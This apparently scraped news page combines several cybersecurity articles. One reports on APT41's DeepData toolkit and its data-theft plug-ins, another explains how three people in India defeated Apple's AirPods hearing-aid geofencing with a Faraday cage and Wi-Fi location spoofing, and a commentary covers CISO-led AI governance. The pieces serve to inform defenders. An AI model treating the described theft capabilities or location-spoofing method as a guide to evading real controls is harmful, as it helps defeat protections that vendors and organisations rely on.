6.  Play Ransomware: Making waves with high-profile attacks, Play Ransomware is as versatile as it is relentless. From targeting public and private sectors to exploiting FortiOS vulnerabilities and RDP servers, this group keeps victims on their toes with ever-evolving techniques.
    

Want the full rundown? Visit the OpenText Cybersecurity Community, view the infographic, and join us for our "Nastiest Malware Webinar" to dive deeper into this year's findings and stay ahead of emerging threats!

About OpenText Cybersecurity  
OpenText Cybersecurity provides comprehensive security solutions for companies and partners of all sizes. From prevention, detection and response to recovery, investigation and compliance, our unified/end-to-end platform helps customers build cyber resilience via a holistic security portfolio. Powered by actionable insights from our real-time and contextual threat intelligence, OpenText Cybersecurity customers benefit from high-efficacy products, compliant experience and simplified security to help manage business risk.

About OpenText   
OpenText™ is the leading Information Management software and services company in the world.  We help organizations solve complex global problems with a comprehensive suite of Business Clouds, Business AI, and Business Technology.  For more information about OpenText (NASDAQ/TSX: OTEX), please visit us at www.opentext.com.

Connect with us:

OpenText CEO Mark Barrenechea's blog  
Twitter | LinkedIn 

Certain statements in this press release may contain words considered forward-looking statements or information under applicable securities laws. These statements are based on OpenText's current expectations, estimates, forecasts and projections about the operating environment, economies, and markets in which the company operates. These statements are subject to important assumptions, risks and uncertainties that are difficult to predict, and the actual outcome may be materially different. OpenText's assumptions, although considered reasonable by the company at the date of this press release, may prove to be inaccurate and consequently its actual results could differ materially from the expectations set out herein. For additional information with respect to risks and other factors which could occur, see OpenText's Annual Report on Form 10-K, Quarterly Reports on Form 10-Q and other securities filings with the SEC and other securities regulators. Readers are cautioned not to place undue reliance upon any such forward-looking statements, which speak only as of the date made. Unless otherwise required by applicable securities laws, OpenText disclaims any intention or obligations to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise. Further, readers should note that we may announce information using our website, press releases, securities law filings, public conference calls, webcasts and the social media channels identified on the Investors section of our website (https://investors.opentext.com). Such social media channels may include the Company's or our CEO's blog, Twitter account or LinkedIn account. The information posted through such channels may be material. Accordingly, readers should monitor such channels in addition to our other forms of communication.

OpenText Cybersecurity Unveils 2024's Nastiest Malware

The China-affiliated group is using the highly modular DeepData framework to target organizations in South Asia.

Source: u3d via Shutterstock

China's APT41 threat group is using a sophisticated Windows-based surveillance toolkit in a cyber-espionage campaign targeting organizations in South Asia.

The malware adds to the already broad portfolio of malicious tools that the threat actor has deployed in recent years and makes APT41 an even more pernicious threat to targeted enterprises.

**Optimized Plug-ins**

Researchers at BlackBerry, among the many who are tracking the threat actor, spotted the new malware toolkit earlier this year and have dubbed it "DeepData Framework." Their analysis showed it to be a highly modular toolkit that supports as many as 12 separate plug-ins, each one optimized for a specific malicious function.

Four of the plug-ins steal communications from WhatsApp, Signal, Telegram, and WeChat. Another three are rigged to steal and exfiltrate system information, Wi-Fi network data, and information on all installed applications on the compromised system — including names and installation paths. Three DeepData plug-ins steal information related to browsing history and cookies; they also grab passwords from Web browsers, Baidu storage services, FoxMail, and other cloud services, and other information like user emails and contact lists in Microsoft Outlook. The remaining two plug-ins enable theft of audio files from compromised systems.

Blackberry researchers chanced upon DeepData when conducting an investigation of "LightSpy," an iOS implant that they have tracked APT41 using in an ongoing and wide-ranging mobile espionage campaign against targets in India and South Asia. Their analysis showed DeepData to have a similar design to LightSpy in that both have a core module and support for multiple data theft plug-ins.

Significantly, DeepData appears to be a malware toolkit that the attackers are manually interacting with after compromising a target and gaining access. "The \[command and control\] address is also specified as a command line argument, as are the requested plugins to be run or data to extract," Blackberry's research and intelligence team said in a blog post this week. "The implication of this execution method is that it must be done manually, sans a script or some other bundling distribution."

**Surveillance Powers Continue to Grow**

DeepData adds to APT41's already formidable surveillance and cyber espionage capabilities. The malicious framework is an example of the constantly emerging threats that organizations have to deal with when trying to mitigate threats from advanced persistent threat groups and nation-state bad actors. "Our latest findings indicate that the threat actor behind DeepData has a clear focus on long-term intelligence gathering," BlackBerry said. Since first deploying LightSpy in 2022, the threat actor has methodically and strategically bulked up its capabilities to intercept communications and steal data in total stealth, BlackBerry said.

APT41 is a known threat actor that security vendors and researchers have been variously tracking as Winnti, WickedPanda, Barium, Wicked Spider, and other names. Some vendors consider APT41 to be a collection of smaller subgroups collectively working at the behest of, or on behalf of the Chinese government. The group's mandate appears to be very broad, based on its targets and the kind of campaigns it has conducted in recent years.

Most recently, researchers tied APT41 to attacks targeting global logistics and utilities companies, and to a campaign that targeted research entities in Taiwan. Over the years, the group has stolen data from a wide range of organizations, including intellectual property and trade secrets from healthcare organizations, media and entertainment companies, government agencies, automative firms, retailers, energy companies, pharmaceutical companies, and others. Its activities prompted a US government investigation and subsequent indictment of five alleged members of APT41 back in 2020. Its victims have spanned Europe, Asia, and North America.

The group's latest South Asian campaign appears aimed at politicians, journalists, and political activists in the region, according to BlackBerry. "Organizations of all sizes, particularly those in targeted regions, should treat this threat as a high priority and implement comprehensive defensive measures."

The company's recommended mitigation measures include blocking the group's known C2 infrastructure, monitoring networks and devices for unexpected audio recording activities, using secure communications for transmitting data, and deploying the detection rules that BlackBerry has released for DeepData components.  

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 a.m. ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, and Elvia Finalle from Omdia. Register now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Toolkit Vastly Expands APT41's Surveillance Powers

Three technologists in India used a homemade Faraday cage and a microwave oven to get around Apple’s location blocks.

When Apple released a software update at the start of November that enabled its new hearing aid features in AirPods Pro 2 earbuds, Rithwik Jayasimha immediately went out with his dad to buy a pair for his grandma. “We came back home, we took them out of the case, and I was looking for the feature and it was just missing,” Jayasimha says. India, where Jayasimha and his family live, is not one of the many countries where Apple’s hearing aid features are available. “It was a huge bummer,” Jayasimha says.

Instead of abandoning the headphones, Jayasimha and two friends, Arnav Bansal and Rithvik Vibhu—both of whom say they have grandmas who use hearing aids as well—hacked a way to bypass Apple’s location restrictions and enable their hearing aids in Bangalore.

To dodge Apple’s geolocation restrictions, the trio built a rudimentary, signal-blocking Faraday cage on top of a microwave with aluminum foil, which ultimately allowed them to enable the hearing aid settings. “We don’t even think it’s Apple’s fault. The feature is amazing,” Jayasimha says.

One of the older hearing aids that was replaced with an Apple’s AirPods Pro 2.Photograph: Lagrange Point/Rithwik Jayasimha

The group members, who have a mix of hardware and software skills and first detailed their hack as part of a technology collective called Lagrange Point, say a couple of dozen people have contacted them asking for help with their AirPods. “We’ve got a huge amount of interest from folks in India who have these AirPods or whose grandparents need them and they’ve not been able to use them,” Jayasimha says. Others have documented the same issue in social media posts.

The researchers demonstrated that they could bypass Apple’s geographic restrictions with a set of AirPods Pro 2 connected to a 10th generation Wi-Fi-only iPad. They note that it would be possible to do the workaround on an iPhone or iPad connected to a mobile carrier as well, but it would be more involved.

To find the workaround, the researchers first looked at the different ways that iOS establishes where a device is in the world. For Wi-Fi-only devices, there are a few checks. The server looks at which Apple Store region the device is connected to, as well as the time zone, language, and region the device is set to. Additionally, the operating system sends a simple web request to an Apple web service that then responds with the country code of the country the device appears to be in based on the location associated with its IP address.

The researchers first tried manually changing the time zone and region settings for the iPad, but it ultimately wasn’t clear whether this impacted their ability to hide the iPad’s true location. When masking the iPad’s IP address so it would appear to be connected in the United States didn’t work, the researchers assessed other metrics the device might be using to establish its geographic location. It turns out that iOS also examines Wi-Fi “service set identifiers,” or SSIDs, that help devices connect to the right Wi-Fi network when there are many network signals in the air—like in an apartment building or at a coffee shop.

The operating system also uses GPS triangulation and device identifier “MAC addresses” of nearby devices, including routers, to establish a device’s location. In other words, even if a person in Bangalore uses a proxy to make it seem like their iPad has a US-based IP address, all the nearby routers and devices are associated with India-located IP addresses that give the real location away.

To deal with this, the researchers rigged up a Faraday cage, which blocks electromagnetic signals, to isolate the iPad from the other devices and wireless networks around it. They built their aluminum-foil-clad enclosure on top of a regular kitchen microwave and then turned on the microwave whenever they wanted to block signals to the iPad. The setup worked because consumer microwaves heat food using electromagnetic waves that are at the same frequency as Wi-Fi signals—2.4 GHz. Essentially, the researchers had turned their microwave oven into a Wi-Fi jammer.

The hackers first built a Faraday cage using a cardboard box and several sheets of aluminum foil, and placed it on top of a microwave to further block wireless signals.Photograph: Lagrange Point/Rithwik Jayasimha

“We put several layers of aluminum inside and outside \[a cardboard box\] and we’d see some signal strength drop,” Bansal says. “Of course, it’s not going to be great, but combined with the microwave, it worked.”

Ultimately, the researchers designed a less ingenious, but simpler and more reliable Faraday cage to make their manipulation more practical. With the iPad placed in its own shielded bubble, the researchers used an open source Wi-Fi location database and Wi-Fi SSID cycling tool to trick iOS into locating the iPad in California. With this complete, the AirPods could work as hearing aids in India.

Apple offers the hearing aid features in more than 100 countries, and it has great promise as a tool for making hearing aid tech more accessible—and more palatable—to millions of people around the world. But the company isn’t able to offer the feature everywhere and restricts access in certain countries, like India, likely because of regulatory hurdles related to medical devices. The fact that it’s possible to circumvent these restrictions may offer a solution, at least temporarily, for people in blocked countries who are looking for a workaround.

Apple did not return WIRED’s request for comment about the findings, but the researchers note that it seems like it would be possible for Apple to close the loophole they discovered fairly easily. They say they haven’t heard from the company.

Alan Woodward, a cybersecurity professor at the University of Surrey, says their work is “very interesting” and demonstrates how there may often be ways around “safeguards” put in place by Big Tech. “It shows that those with the technical understanding can bypass the geofencing of apps relatively simply,” Woodward says. “Not that everyone could do it, but they probably know someone that can.”

“I’m not sure how many people realize the number of variants in something like iOS even on what is apparently the same version—the build number is what really matters,” Woodward says. “It’s more a lesson to people that you have more than you realize on your phone.”

The second version of the Faraday cage, which the researchers plan to use to run more experiments.Photograph: Lagrange Point/Rithwik Jayasimha

Services offered by Big Tech companies such as Apple and Google often have had staggered launches around the world as lawmakers have introduced regulations to control technology companies’ power and protect people’s rights. In the EU, for instance, several AI products have been delayed or not launched due to strict privacy laws. Apple has also been required to allow alternative App Stores due to EU rules. At the same time, right-to-repair movements have grown in popularity, and people have increasingly been hacking into the products they buy.

While the three researchers in India believe that it is likely Apple’s hearing aid features will officially come to the country in the coming months, they plan in the meantime to help the dozens of people they say have reached out to them about their own headphones. They also plan on using the second version of the Faraday cage to set up people’s AirPods. From their own grandmas’ experiences, the hearing aid features appear to be valuable in their everyday lives.

Bansal says his grandma has some hearing loss and other health challenges, but has typically worn hearing aids while watching television. “She used to wear her old clunky hearing aids, and they were really problematic because they had these tiny little buttons on them,” Bansal says. “But now she uses the AirPods, we’ve set it up with her hearing profile, and she can use it to watch the TV just fine and it’s a lot nicer. She doesn’t feel like a patient wearing it.”

These Guys Hacked AirPods to Give Their Grandmas Hearing Aids

CISOs understand the risk scenarios that can help create safeguards so everyone can use AI safely and focus on the technology's promises and opportunities.

Lucas Moody, Chief Information Security Officer, Alteryx

November 13, 2024

4 Min Read

Source: Andreas Prott via Alamy Stock Photo

COMMENTARY

No one wants to miss the artificial intelligence (AI) wave, but the "fear of missing out" has leaders poised to step onto an already fast-moving train where the risks can outweigh the rewards. A PwC survey highlighted a stark reality: 40% of global leaders don't understand the cyber-risks of generative AI (GenAI), despite their enthusiasm for the emerging technology. This is a red flag that could expose companies to security risks from negligent AI adoption. This is precisely why a chief information security officer (CISO) should lead in AI technology evaluation, implementation, and governance. CISOs understand the risk scenarios that can help create safeguards so everyone can use the technology safely and focus more on AI's promises and opportunities. 

**The AI Journey Starts With a CISO **

Embarking on the AI journey can be daunting without clear guidelines, and many organizations are uncertain about which C-suite executive should lead the AI strategy. Although having a dedicated chief AI officer (CAIO) is one approach, the fundamental issue remains that integrating any new technology inherently involves security considerations. 

The rise of AI is bringing security expertise to the forefront for organizationwide security and compliance. CISOs are critical to navigating the complex AI landscape among emerging new regulations and executive orders to ensure privacy, security, and risk management. As a first step to an organization's AI journey, the CISOs are responsible for implementing a security-first approach to AI and establishing a proper risk management strategy via policy and tools. This strategy should include:   

Related:Dark Reading Confidential: Pen-Test Arrests, 5 Years Later

*   Aligning AI goals: Establish an AI consortium to align stakeholders and the adoption goals with your organization's risk tolerance and strategic objectives to avoid rogue adoption.  
    

*   Collaborating with cybersecurity teams: Partner with cybersecurity experts to build a robust risk evaluation framework.  
    

*   Creating security-forward guardrails: Implement safeguards to protect intellectual property, customer and internal data, and other critical assets against cyber threats.  
    

**Determining Acceptable Risk **

Although AI has plenty of promise for organizations, rapid and unrestrained GenAI deployment can lead to issues like product sprawl and data mismanagement. Preventing the risk associated with these problems requires aligning the organization's AI adoption efforts.  

CISOs ultimately set the security agenda with other leaders, like chief technology officers, to address knowledge gaps and ensure the entire business is aligned on the strategy to manage governance, risk, and compliance. CISOs are responsible for the entire spectrum of AI adoption — from securing AI consumption (i.e., employees using ChatGPT) to building AI solutions. To help determine acceptable risk for their organization, CISOs can establish an AI consortium with key stakeholders that work cross-functionally to surface risks associated with the development or consumption of GenAI capabilities, establish acceptable risk tolerances, and act as a shared enforcement arm to maintain appropriate controls on the proliferation of AI use. 

Related:Varonis Warns of Bug Discovered in PostgreSQL PL/Perl

Suppose the organization is focused on securing AI consumption. In that case, the CISO must determine how employees can and cannot use the technology, which can be whitelisted or blacklisted or more granularly managed with products like Harmonic Security that enable a risk-managed adoption of SaaS-delivered GenAI tech. On the other hand, if the organization is building AI solutions, CISOs must develop a framework for how the technology will work. In either case, CISOs must have a pulse on AI developments to recognize the potential risks and stack projects with the right resources and experts for responsible adoption. 

Related:The Vendor's Role in Combating Alert Fatigue

**Locking in Your Security Foundation  **

Since CISOs have a security background, they can implement a robust security foundation for AI adoption that proactively manages risk and establishes the correct barriers to prevent breakdowns from cyber threats. CISOs bridge the collaboration of cybersecurity and information teams with business units to stay informed about threats, industry standards, and regulations like the EU AI Act.  

In other words, CISOs and their security teams establish comprehensive guardrails, from assets management to robust encryption techniques, to be the backbone of secure AI integration. They protect intellectual property, customer and internal data, and other vital assets. It also ensures a broad spectrum of security monitoring, from rigorous personnel security checks and ongoing training to robust encryption techniques, to respond promptly and effectively to potential security incidents. 

Remaining vigilant about the evolving security landscape is essential as AI becomes mainstream. By seamlessly integrating security into every step of the AI life cycle, organizations can be proactive against the rising use of GenAI for social engineering attacks, making distinguishing between genuine and malicious content harder. Additionally, bad actors are leveraging GenAI to create vulnerabilities and accelerate the discovery of weaknesses in defenses. To address these challenges, CISOs must be diligent by continuing to invest in preventative and detective controls and considering new ways to disseminate awareness among the workforces.   

**Final Thoughts  **

AI will touch every business function, even in ways that have yet to be predicted. As the bridge between security efforts and business goals, CISOs serve as gatekeepers for quality control and responsible AI use across the business. They can articulate the necessary ground for security integrations that avoid missteps in AI adoption and enable businesses to unlock AI's full potential to drive better, more informed business outcomes.    

**About the Author**

Chief Information Security Officer, Alteryx

Lucas Moody is chief information security officer (CISO) at Alteryx and is focused on protecting Alteryx products, customers, and the business from cyber threats. Lucas is a technical security leader with extensive experience spanning enterprise and consumer software companies across the technology, financial, social networking, and retail sectors. He is a global-minded executive noted for his ability to drive security outcomes while enabling growing businesses to accelerate. His passion for technology, security, and building amazing teams has helped companies thrive during periods of hyper-growth and change.

Tag

#ios